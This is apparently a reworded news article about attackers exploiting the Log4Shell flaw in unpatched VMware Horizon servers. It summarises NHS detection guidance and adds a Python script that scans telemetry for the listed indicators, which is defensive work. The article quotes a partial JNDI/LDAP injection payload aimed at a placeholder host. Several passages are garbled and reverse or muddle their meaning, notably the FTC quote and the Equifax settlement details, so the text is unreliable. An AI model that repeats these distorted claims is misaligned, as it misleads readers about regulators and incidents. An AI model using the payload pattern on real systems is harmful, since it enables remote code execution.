https://safirsoft.com British and US officials warn that unpatched systems are vulnerable to critical Log4j flaws

Log4Shell, one of the most serious vulnerabilities in recent years, is still being exploited, the UK's public healthcare system warns. Exploitation gives attackers full control of affected systems.

CVE-2021-44228 is one of the most dangerous vulnerabilities discovered in the past few years. It resides in Log4j, a logging code library used in thousands, if not millions, of third-party apps and websites. This means that there is a huge base of vulnerable systems. In addition, the vulnerability is very easy to exploit and allows attackers to install web shells, which provide a command window for executing highly privileged commands on compromised servers.

The remote code execution flaw in Log4j came to light in December, after exploit code was released before a patch became available. Soon, malicious hackers began actively exploiting CVE-2021-44228 to infiltrate sensitive systems.

Attacks, including those targeting VMware Horizon, have persisted since then and have affected networks, officials with the UK's NHS wrote. They went on to provide guidance on specific steps affected organizations can take to reduce the threat. Most important is the recommendation to install the updates that VMware has released for its Horizon product, which gives organizations a way to virtualize desktop and application capabilities using the company's virtualization technology. Vulnerable organizations can also seek to identify potential attacks they may have experienced.

This came a day after the Federal Trade Commission warned consumers to overhaul weak regulations to prevent Equifax's fate. In 2019, the credit reporting agency agreed to pay $575 million to cover costs for the Federal Trade Commission for failing to fix a similarly critical vulnerability in a different program called Apache Struts. When an unknown attacker exploited the vulnerability on the Equifax network, it compromised the sensitive data of 143 million people, making it one of the worst data breaches of all time. FTC officials said: “The FTC intends to use its full legal authority to sue companies that take reasonable steps to protect consumer data from future exposure. mine for Log4j or similar known vulnerabilities”.

The NHS is at least the second organization to find exploitation targeting VMware products. Last month, researchers reported that attackers targeted systems running VMware vCenter to install Conti ransomware.

Attacks targeting unmodified VMware Horizon servers targeted use of the NPS service source. They are run by a one-time Log4Shell payload similar to ${jndi:ldap://example.com..' This attack exploits the Log4Shell vulnerability in the Apache Tomcat service built into VMware Horizon. It then executes the following PowerShell command from ws_TomcatService.exe:

[Image: PowerShell command. Credit: NHS]

After a few more steps, attackers can install a web shell that maintains a persistent connection to a server they control. Here is an image of the attack:

[Image: diagram of the attack, https://cdn.arstechnica.net/wp-content/uploads/2022/01/attacker-diagram-nhs-1280x503.png. Credit: NHS]

The guidance added:

Organizations should look for the following:

Evidence of abnormal processes spawned by ws_TomcatService.exe

Any powershell.exe process that contains "VMBlastSG" in the command line

File changes to VMware\VMware View\Server\lib\abblastgate\-worker. js' - This file is generally overwritten during upgrades, and is not otherwise changed.
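The three checks above, applied to exported endpoint telemetry, as an added example that is not part of the NHS guidance or the original article. The event field names, the sample paths, the allowlist of expected child processes and the watched-file path are assumptions constructed for illustration.

```python
import ntpath

# Constructed telemetry; field names and paths are illustrative assumptions.
TOMCAT = r"C:\example\horizon\ws_TomcatService.exe"
WATCHED_FILE = r"C:\example\horizon\worker.js"  # placeholder for the file named in the guidance
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "process", "parent": TOMCAT, "image": PS,
     "cmdline": "powershell.exe -NoProfile <constructed placeholder referencing VMBlastSG>"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe Get-Service"},
    {"type": "process", "parent": TOMCAT, "image": r"C:\example\horizon\java.exe",
     "cmdline": "java.exe -version"},
    {"type": "file_write", "path": WATCHED_FILE.upper()},
    {"type": "file_write", "path": r"C:\example\horizon\logs\debug.log"},
]

R_CHILD = "abnormal child process of ws_TomcatService.exe"
R_PS = "powershell.exe with VMBlastSG in command line"
R_FILE = "watched file modified outside an upgrade"


def exe_name(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def hunt(events, allowed_children=frozenset(), watched_file=None):
    """Return (event index, reason) for every event matching one of the three checks.

    allowed_children is a site-specific baseline of child processes that are
    normal for ws_TomcatService.exe (hypothetical here); anything else is flagged.
    """
    findings = []
    for i, ev in enumerate(events):
        if ev["type"] == "process":
            child = exe_name(ev["image"])
            if exe_name(ev["parent"]) == "ws_tomcatservice.exe" and child not in allowed_children:
                findings.append((i, R_CHILD))
            # Windows command lines are case-insensitive, so compare lower-cased.
            if child == "powershell.exe" and "vmblastsg" in ev["cmdline"].lower():
                findings.append((i, R_PS))
        elif ev["type"] == "file_write" and watched_file:
            if ev["path"].lower() == watched_file.lower():
                findings.append((i, R_FILE))
    return findings


if __name__ == "__main__":
    for idx, reason in hunt(SAMPLE_EVENTS, {"java.exe"}, WATCHED_FILE):
        print(f"event {idx}: {reason}")
```

File-write hits during a planned Horizon upgrade are expected, since the file is normally overwritten then; correlate them with change records before escalating.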

The security company Praetorian released a tool on Friday to identify systems that are vulnerable to widespread attack.


